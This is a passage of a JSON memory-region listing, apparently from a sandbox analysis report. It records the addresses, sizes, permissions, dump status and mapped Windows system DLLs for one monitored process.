"executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1934491648, "type": "region", "version": 1 }, "end_va": 1934557183, "entry_point": 1934491648, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_521", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1934491648, "timestamp": "00:00:27.206", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000522-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_522", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:27.248", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000523-addr_0x0000000001b30000-size_0x0000000000160000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1441792, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 0, "filename": null, "id": "region_523", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:00:27.249", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000524-addr_0x0000000001dd0000-size_0x00000000001d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], 
"ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1900544, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 33161215, "entry_point": 0, "filename": null, "id": "region_524", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:00:27.250", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000525-addr_0x0000000001b30000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 29818879, "entry_point": 0, "filename": null, "id": "region_525", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:00:27.251", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000526-addr_0x0000000001c80000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 29949951, "entry_point": 0, "filename": null, "id": "region_526", "name": "private_0x0000000001c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 29884416, "timestamp": "00:00:27.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 24576, "start_va": 1862336512, "type": "region", "version": 1 }, "end_va": 1862361087, "entry_point": 1862336512, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_527", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1862336512, "timestamp": "00:00:27.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000528-addr_0x0000000001b30000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_528", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:00:27.292", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000529-addr_0x0000000001dd0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_529", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:00:27.293", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000530-addr_0x0000000001f90000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], 
"ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 33161215, "entry_point": 0, "filename": null, "id": "region_530", "name": "private_0x0000000001f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 33095680, "timestamp": "00:00:27.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1940455424, "type": "region", "version": 1 }, "end_va": 1940520959, "entry_point": 1940455424, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_531", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1940455424, "timestamp": "00:00:27.294", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000532-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_532", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:27.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1940258816, "type": "region", 
"version": 1 }, "end_va": 1940332543, "entry_point": 1940258816, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_533", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1940258816, "timestamp": "00:00:27.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1957888000, "type": "region", "version": 1 }, "end_va": 1958133759, "entry_point": 1957888000, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_534", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1957888000, "timestamp": "00:00:27.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1940193280, "type": "region", "version": 1 }, "end_va": 1940226047, "entry_point": 1940193280, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_535", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1940193280, "timestamp": "00:00:27.301", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1952972800, "type": "region", "version": 1 }, "end_va": 1952993279, "entry_point": 1952972800, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_536", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", 
"region_type": "memory_mapped_file", "start_va": 1952972800, "timestamp": "00:00:27.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1957822464, "type": "region", "version": 1 }, "end_va": 1957847039, "entry_point": 1957822464, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_537", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1957822464, "timestamp": "00:00:27.305", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000538-addr_0x0000000000560000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_79", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5767167, "entry_point": 0, "filename": null, "id": "region_538", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:00:27.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1932001280, "type": "region", "version": 1 }, "end_va": 1932230655, "entry_point": 1932001280, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_539", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1932001280, "timestamp": "00:00:27.316", "type": "region", "version": 1 }, { "dump": { 
"filename": "process_00000003-region_00000540-addr_0x0000000001f40000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_80", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_540", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:00:27.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 368640, "start_va": 1867710464, "type": "region", "version": 1 }, "end_va": 1868079103, "entry_point": 1867710464, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_541", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 1867710464, "timestamp": "00:00:27.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000542-addr_0x0000000002020000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_81", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 34734079, "entry_point": 0, "filename": null, "id": "region_542", "name": "private_0x0000000002020000", "norm_filename": null, "region_type": "private_memory", "start_va": 33685504, "timestamp": "00:00:27.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 
"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_543", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:27.359", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000544-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_82", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_544", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:00:27.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_545", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:27.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 57344, "start_va": 1963524096, "type": "region", "version": 1 }, "end_va": 1963581439, "entry_point": 1963524096, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_546", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1963524096, "timestamp": "00:00:27.371", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1968635904, "type": "region", "version": 1 }, "end_va": 1968648191, "entry_point": 1968635904, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_547", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 1968635904, "timestamp": "00:00:27.373", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000548-addr_0x0000000002240000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_83", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 36962303, "entry_point": 0, "filename": null, "id": "region_548", "name": "private_0x0000000002240000", "norm_filename": null, "region_type": "private_memory", "start_va": 35913728, "timestamp": "00:00:27.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1915158528, "type": "region", "version": 1 }, "end_va": 
1915203583, "entry_point": 1915158528, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_549", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 1915158528, "timestamp": "00:00:27.398", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000550-addr_0x000000007ffd7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_84", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147315712, "type": "region", "version": 1 }, "end_va": 2147319807, "entry_point": 0, "filename": null, "id": "region_550", "name": "private_0x000000007ffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147315712, "timestamp": "00:00:27.461", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000551-addr_0x0000000002430000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_85", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 38993919, "entry_point": 0, "filename": null, "id": "region_551", "name": "private_0x0000000002430000", "norm_filename": null, "region_type": "private_memory", "start_va": 37945344, "timestamp": "00:00:27.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000552-addr_0x000000007ffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_86", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", 
"version": 1 }, "size": 4096, "start_va": 2147311616, "type": "region", "version": 1 }, "end_va": 2147315711, "entry_point": 0, "filename": null, "id": "region_552", "name": "private_0x000000007ffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147311616, "timestamp": "00:00:27.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1848442880, "type": "region", "version": 1 }, "end_va": 1848475647, "entry_point": 1848442880, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_553", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 1848442880, "timestamp": "00:00:27.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1931804672, "type": "region", "version": 1 }, "end_va": 1931878399, "entry_point": 1931804672, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_684", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1931804672, "timestamp": "00:00:27.595", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1931935744, "type": "region", "version": 1 }, "end_va": 1931988991, "entry_point": 1931935744, "filename": "\\Windows\\System32\\dhcpcsvc6.dll", "id": "region_685", "name": "dhcpcsvc6.dll", "norm_filename": 
"c:\\windows\\system32\\dhcpcsvc6.dll", "region_type": "memory_mapped_file", "start_va": 1931935744, "timestamp": "00:00:27.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000686-addr_0x00000000017c0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_88", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 24903680, "type": "region", "version": 1 }, "end_va": 25427967, "entry_point": 0, "filename": null, "id": "region_686", "name": "private_0x00000000017c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 24903680, "timestamp": "00:00:27.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1919811584, "type": "region", "version": 1 }, "end_va": 1920057343, "entry_point": 1919811584, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_687", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 1919811584, "timestamp": "00:00:27.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 5505024, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_688", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 5505024, "timestamp": "00:00:27.738", "type": "region", "version": 1 }, { "dump": 
{ "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1962934272, "type": "region", "version": 1 }, "end_va": 1963323391, "entry_point": 1962934272, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_689", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1962934272, "timestamp": "00:00:27.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 5771263, "entry_point": 0, "filename": null, "id": "region_690", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:00:27.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11010048, "start_va": 1831272448, "type": "region", "version": 1 }, "end_va": 1842282495, "entry_point": 1831272448, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_693", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 1831272448, "timestamp": "00:00:27.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 5767168, 
"type": "region", "version": 1 }, "end_va": 5775359, "entry_point": 0, "filename": null, "id": "region_694", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:00:28.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 20512768, "type": "region", "version": 1 }, "end_va": 20582399, "entry_point": 20512768, "filename": "\\Windows\\System32\\C_20127.NLS", "id": "region_764", "name": "c_20127.nls", "norm_filename": "c:\\windows\\system32\\c_20127.nls", "region_type": "memory_mapped_file", "start_va": 20512768, "timestamp": "00:00:46.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 38993920, "type": "region", "version": 1 }, "end_va": 43134975, "entry_point": 0, "filename": null, "id": "region_765", "name": "pagefile_0x0000000002530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38993920, "timestamp": "00:00:46.563", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000766-addr_0x0000000002940000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_103", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 43253760, "type": "region", "version": 1 }, "end_va": 44302335, "entry_point": 0, "filename": null, "id": "region_766", "name": "private_0x0000000002940000", "norm_filename": null, "region_type": 
"private_memory", "start_va": 43253760, "timestamp": "00:00:46.563", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000767-addr_0x0000000002b90000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_104", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 45678592, "type": "region", "version": 1 }, "end_va": 46727167, "entry_point": 0, "filename": null, "id": "region_767", "name": "private_0x0000000002b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 45678592, "timestamp": "00:00:46.564", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000768-addr_0x000000007ffd4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_105", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147303424, "type": "region", "version": 1 }, "end_va": 2147307519, "entry_point": 0, "filename": null, "id": "region_768", "name": "private_0x000000007ffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147303424, "timestamp": "00:00:46.564", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000769-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_106", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_769", "name": "private_0x000000007ffd5000", 
"norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:46.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 1854668800, "type": "region", "version": 1 }, "end_va": 1855397887, "entry_point": 1854668800, "filename": "\\Windows\\System32\\jscript.dll", "id": "region_770", "name": "jscript.dll", "norm_filename": "c:\\windows\\system32\\jscript.dll", "region_type": "memory_mapped_file", "start_va": 1854668800, "timestamp": "00:00:46.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1912143872, "type": "region", "version": 1 }, "end_va": 1912279039, "entry_point": 1912143872, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_771", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 1912143872, "timestamp": "00:00:46.766", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000775-addr_0x0000000002d60000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_107", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 47579136, "type": "region", "version": 1 }, "end_va": 48627711, "entry_point": 0, "filename": null, "id": "region_775", "name": "private_0x0000000002d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 47579136, "timestamp": "00:00:47.030", 
"type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000777-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_108", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": "region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_777", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:00:47.030", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000804-addr_0x0000000002a90000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_113", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 44630016, "type": "region", "version": 1 }, "end_va": 45678591, "entry_point": 0, "filename": null, "id": "region_804", "name": "private_0x0000000002a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 44630016, "timestamp": "00:00:47.272", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000805-addr_0x000000007ffaf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_114", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147151872, "type": "region", "version": 1 }, "end_va": 2147155967, "entry_point": 0, "filename": null, "id": "region_805", "name": "private_0x000000007ffaf000", "norm_filename": null, "region_type": "private_memory", "start_va": 
